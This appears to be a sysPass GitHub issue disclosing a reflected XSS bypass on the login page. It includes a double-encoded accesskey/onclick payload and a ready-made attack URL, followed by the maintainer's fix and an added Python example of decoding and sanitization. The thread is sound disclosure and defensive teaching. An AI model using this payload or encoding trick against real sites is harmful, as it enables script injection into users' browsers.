I found that issue #615 was kind of interesting for the bypass found by the researcher, so I decided to try to exploit the same page.
It is a bit tricky since the field is hidden, but if we accept that user interaction can be needed for the PoC, the following payload will show you an alert when you press the key combination Alt+Shift+X (Ctrl+Alt+X on OS X):
" accesskey="X" onclick="alert(1)
HTML encoded then URL encoded, you get:
%26%23x22%3B%26%23x20%3B%26%23x61%3B%26%23x63%3B%26%23x63%3B%26%23x65%3B%26%23x73%3B%26%23x73%3B%26%23x6B%3B%26%23x65%3B%26%23x79%3B%26%23x3D%3B%26%23x22%3B%26%23x58%3B%26%23x22%3B%26%23x20%3B%26%23x6F%3B%26%23x6E%3B%26%23x63%3B%26%23x6C%3B%26%23x69%3B%26%23x63%3B%26%23x6B%3B%26%23x3D%3B%26%23x22%3B%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x29%3B
So with the URL to the login page of sysPass:
https://<syspass_instance>/?%26%23x22%3B%26%23x20%3B%26%23x61%3B%26%23x63%3B%26%23x63%3B%26%23x65%3B%26%23x73%3B%26%23x73%3B%26%23x6B%3B%26%23x65%3B%26%23x79%3B%26%23x3D%3B%26%23x22%3B%26%23x58%3B%26%23x22%3B%26%23x20%3B%26%23x6F%3B%26%23x6E%3B%26%23x63%3B%26%23x6C%3B%26%23x69%3B%26%23x63%3B%26%23x6B%3B%26%23x3D%3B%26%23x22%3B%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x29%3B
The reasoning behind the bypass is similar to the one in issue #615, so I don't think it is worth explaining it any further.
I did not check the rest of the application, but it is likely that other pages are vulnerable to a similar bypass that does not require user interaction if the same sanitization method is used in another context.
Regarding this notice, I'm wondering if you checked it out against the master branch, because it hasn't been released yet, so any version before 2.1.10 will be affected.
Hi, you're right, the input parsing method didn't manage this kind of input.
This has been solved in the latest commit, by using an aggressive input parsing that only allows chars and numbers, stripping out unwanted special and escaped chars.
I really appreciate your pen-testing, because it really allows us to get a more secure sysPass.
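To make the two encoding layers in the report (HTML entities, then percent-encoding) and the allowlist fix described in the maintainer's reply concrete, here is an added Python example; it is not code from the issue or from sysPass. It decodes the report's own percent-encoded string one layer at a time, shows that a quote check applied before entity decoding sees nothing to reject (the `naive_filter_rejects` function is a constructed stand-in, since the issue does not show sysPass's original filter), and then applies two defensive treatments to the normalized value: the letters-and-digits allowlist the maintainer describes, and context-aware escaping for an HTML attribute at output time. The round-trip encoder exists only to confirm that the decoder is the exact inverse of the encoding the report used.

```python
import html
import re
from urllib.parse import quote, unquote

# The percent-encoded payload exactly as posted in the issue (copied from the report).
ENCODED_FROM_ISSUE = (
    "%26%23x22%3B%26%23x20%3B%26%23x61%3B%26%23x63%3B%26%23x63%3B%26%23x65%3B"
    "%26%23x73%3B%26%23x73%3B%26%23x6B%3B%26%23x65%3B%26%23x79%3B%26%23x3D%3B"
    "%26%23x22%3B%26%23x58%3B%26%23x22%3B%26%23x20%3B%26%23x6F%3B%26%23x6E%3B"
    "%26%23x63%3B%26%23x6C%3B%26%23x69%3B%26%23x63%3B%26%23x6B%3B%26%23x3D%3B"
    "%26%23x22%3B%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B"
    "%26%23x28%3B%26%23x31%3B%26%23x29%3B"
)


def url_decode(s: str) -> str:
    """Layer 1: percent-decoding, what the web server hands to the application."""
    return unquote(s)


def entity_decode(s: str) -> str:
    """Layer 2: numeric/named HTML entity decoding, what turns &#x22; into a quote."""
    return html.unescape(s)


def normalize(s: str) -> str:
    """Undo both layers: the characters the browser ultimately interprets."""
    return entity_decode(url_decode(s))


def entity_then_url_encode(s: str) -> str:
    """Re-create the report's encoding (every char as &#xHH;, then percent-encoded)
    so the decoding chain above can be checked as its exact inverse."""
    entities = "".join(f"&#x{ord(c):02X};" for c in s)
    return quote(entities, safe="")


def naive_filter_rejects(s: str) -> bool:
    """Constructed stand-in for a filter that only looks for raw quote/angle characters
    in the string it is given; the entity layer slips past a check like this."""
    return re.search(r'["\'<>]', s) is not None


def allowlist_alnum(s: str) -> str:
    """The hardening the maintainer describes: normalize first, then keep only
    letters and digits, so escaped and special characters never survive."""
    return re.sub(r"[^A-Za-z0-9]", "", normalize(s))


def attribute_escape(s: str) -> str:
    """Context-aware alternative: escape the normalized value for an HTML attribute
    at output time, so quotes cannot terminate the attribute."""
    return html.escape(normalize(s), quote=True)


if __name__ == "__main__":
    after_url = url_decode(ENCODED_FROM_ISSUE)
    print("after URL decode    :", after_url)
    print("raw-quote check hits:", naive_filter_rejects(after_url))
    print("after entity decode :", normalize(ENCODED_FROM_ISSUE))
    print("raw-quote check hits:", naive_filter_rejects(normalize(ENCODED_FROM_ISSUE)))
    print("allowlist result    :", allowlist_alnum(ENCODED_FROM_ISSUE))
    print("escaped output      :", attribute_escape(ENCODED_FROM_ISSUE))
```

The point the two decoders make is that a sanitizer must run on the fully normalized value, not on whatever representation happens to arrive on the wire; otherwise each extra encoding layer is a fresh bypass. Of the two treatments, the allowlist is the blunt but reliable option for a parameter that only ever needs alphanumerics, while attribute escaping is the general answer whenever the value must be reflected verbatim.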
Credits to PortSwigger for the payload: http://blog.portswigger.net/2015/11/xss-in-hidden-input-fields.html